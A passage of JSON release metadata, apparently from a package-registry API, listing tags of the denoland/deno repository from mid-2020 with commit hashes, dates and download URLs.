tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"